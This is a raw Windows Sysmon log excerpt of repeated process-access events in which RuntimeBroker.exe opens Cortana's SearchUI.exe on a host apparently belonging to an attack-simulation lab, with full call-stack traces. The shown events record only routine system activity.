12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007627Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007626Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007625Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007624Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007623Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007622Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007621Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007620Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007619Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007618Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007617Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007616Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007615Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007614Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007613Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007612Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007611Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007610Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:02:36.041{266CAFBE-64C4-6064-9B00-00000000AE01}49245896C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000007609Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 